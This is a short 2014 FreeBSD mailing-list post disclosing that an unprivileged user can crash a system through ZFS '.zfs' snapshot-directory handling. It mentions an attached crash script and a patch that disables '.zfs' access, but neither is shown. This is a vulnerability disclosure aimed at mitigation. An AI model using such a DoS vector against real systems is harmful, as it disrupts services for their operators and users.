Date: Fri, 17 Jan 2014 03:11:44 +0100 (CET)
From: Richard Kojedzinszky
To: freebsd-fs@freebsd.org
Cc: freebsd-security@freebsd.org
Subject: ZFS .zfs DoS

Dear users,

For a long time now I've been investigating problems relating to FreeBSD ZFS .zfs handling, and found that I am not enough to fix issues. Until fixes arrive, unfortunately a regular user can DoS a FreeBSD system which has ZFS filesystems with the attached script.
While the script expects a snapshot argument to be given, actually the first test case does not need that; only a mounted zfs filesystem is enough. For more of the tests a snapshot may be needed, and later ones need a root account also.

I would recommend that until this gets rewritten or fixed at all, one should disable access to .zfs at all with something like I've attached.

Regards,
Kojedzinszky Richard

Attachment: crash.sh
Attachment: no_dot_zfs_at_all.patch